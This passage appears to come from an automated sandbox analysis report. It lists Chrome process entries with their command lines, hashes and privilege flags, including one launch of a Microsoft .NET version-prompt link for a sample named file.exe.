                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1924,i,16693149984039008949,18427732997764737227,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                      Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                      Start time:13:25:36
                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                      Imagebase:0xf60000
                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                      Start time:13:25:36
                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1928,i,15905540884992955177,16070851734019653976,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                      Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      No disassembly